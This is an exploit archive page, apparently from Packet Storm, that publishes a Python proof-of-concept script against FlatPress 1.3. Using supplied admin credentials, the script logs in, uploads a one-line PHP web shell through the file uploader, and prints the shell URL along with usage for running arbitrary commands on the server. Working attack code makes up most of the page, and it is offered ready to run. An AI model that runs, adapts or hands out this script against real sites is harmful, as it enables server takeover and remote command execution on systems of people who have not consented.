exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FlatPress 1.3 Shell Upload

FlatPress 1.3 Shell Upload
Posted Apr 19, 2024
Authored by Ahmet Umit Bayram

FlatPress version 1.3 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 95b37bcd0ee004b10ed07d1d5449e20f0b6c896143d3d34e105388324e4c71e6

FlatPress 1.3 Shell Upload

Change Mirror Download
# Exploit Title: FlatPress v1.3 - Remote Command Execution
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 19.04.2024
# Vendor Homepage: https://www.flatpress.org
# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
# Tested Version: 1.3 (latest)
# Tested on: MacOS

import requests
import time
import random
import string

def random_string(length=5):
"""Rastgele bir string oluşturur."""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))

def login_and_upload(base_url, username, password):
filename = random_string() + ".php"
login_url = f"http://{base_url}/login.php"
upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"

with requests.Session() as session:
# Exploiting
print("Exploiting...")
time.sleep(1)

# Giriş yapma denemesi
login_data = {
'user': username,
'pass': password,
'submit': 'Login'
}
print("Logging in...")
response = session.post(login_url, data=login_data)
time.sleep(1)

if "Logout" in response.text:
print("Login Successful!")
else:
print("Login Failed!")
print(response.text)
return

# Dosya yükleme denemesi
print("Shell uploading...")
time.sleep(1)

# Form verileri ve dosyalar
files = {
'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
}
form_data = {
'_wpnonce': '9e0ed04260',
'_wp_http_referer': '/admin.php?p=uploader',
'upload': 'Upload'
}

response = session.post(upload_url, files=files, data=form_data)

if "File(s) uploaded" in response.text or "Upload" in response.text:
shell_url = f"http://{base_url}/fp-content/attachs/{filename}"
print(f"Your Shell is Ready: {shell_url}")
time.sleep(1)
print(f"Shell Usage: {shell_url}?0=command")
else:
print("Exploit Failed!")
print(response.status_code, response.text)

# Örnek kullanım: python script.py siteadi.com username password
if __name__ == "__main__":
import sys
if len(sys.argv) != 4:
print("Usage: script.py <base_url> <username> <password>")
else:
base_url, username, password = sys.argv[1:]
login_and_upload(base_url, username, password)

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close